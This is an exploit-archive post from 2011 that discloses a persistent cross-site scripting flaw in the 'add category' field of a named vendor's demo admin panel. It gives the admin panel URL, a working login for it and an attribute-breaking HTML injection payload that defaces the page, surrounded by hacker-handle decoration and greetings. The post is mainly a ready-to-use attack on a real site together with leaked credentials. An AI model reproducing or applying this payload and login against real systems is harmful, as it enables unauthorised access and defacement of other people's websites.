Home / exploits Hopestudio.in Cross Site Scripting
Posted on 13 July 2011
%+ $.......#........4.........|).......0............// %+ %+ %+ %++++++++++++++++++++++++++++++++++++++++ # Exploit Title: Hopestudio.in persistent XSS vulnerability # Vendor: www.hopestudio.in/demo.php <http://www.couponscript.org/> # Author: $#4d0//[r007k17] a.k.a Raghavendra Karthik D # My Blog: http://www.shadowrootkit.wordpress.com # Google Dork: © 2009 *Hope Solutions* **************************************************************************************************************************************************************************************** Persistent XSS Vulnerability ******************************** {DEMO} : www.hopestudio.in/portalmanager/admin/ EXPLOIT: ">><marquee><h1>XSSed_by_r007k17</h1></marquee> Observe: A persistent cross-site scripting vulnerability in add category in Admin panel(logged in as : uname: portal password:hope) ***************************************************************************************************************************************************************************************** sp3c14l Thanks to s1d3 effects and my friends@!3.14-- *****************************************************************************************************************************************************************************************
